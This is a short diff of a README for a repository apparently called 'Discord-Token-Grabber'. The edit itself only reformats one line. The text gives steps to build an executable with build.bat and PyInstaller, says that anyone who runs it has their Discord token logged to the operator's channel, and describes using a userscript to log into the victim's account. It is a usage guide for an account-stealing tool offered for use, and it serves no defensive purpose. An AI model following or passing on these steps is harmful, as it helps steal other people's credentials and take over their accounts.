plictisitor/Discord-Token-Grabber/README.md

 3 - Run `build.bat` (it will create an executable.
 IT USES PYINSTALLER.
 MAKE SURE ITS INSTALLED)

-4 - In the /dist/ folder, you can find the exe. people who run it will have their token logged into your channel
+4 - In the /dist/ folder, you can find the exe.
+People who run it will have their token logged into your channel

 5 - Use the userscript `login_userscript.js` to enter his account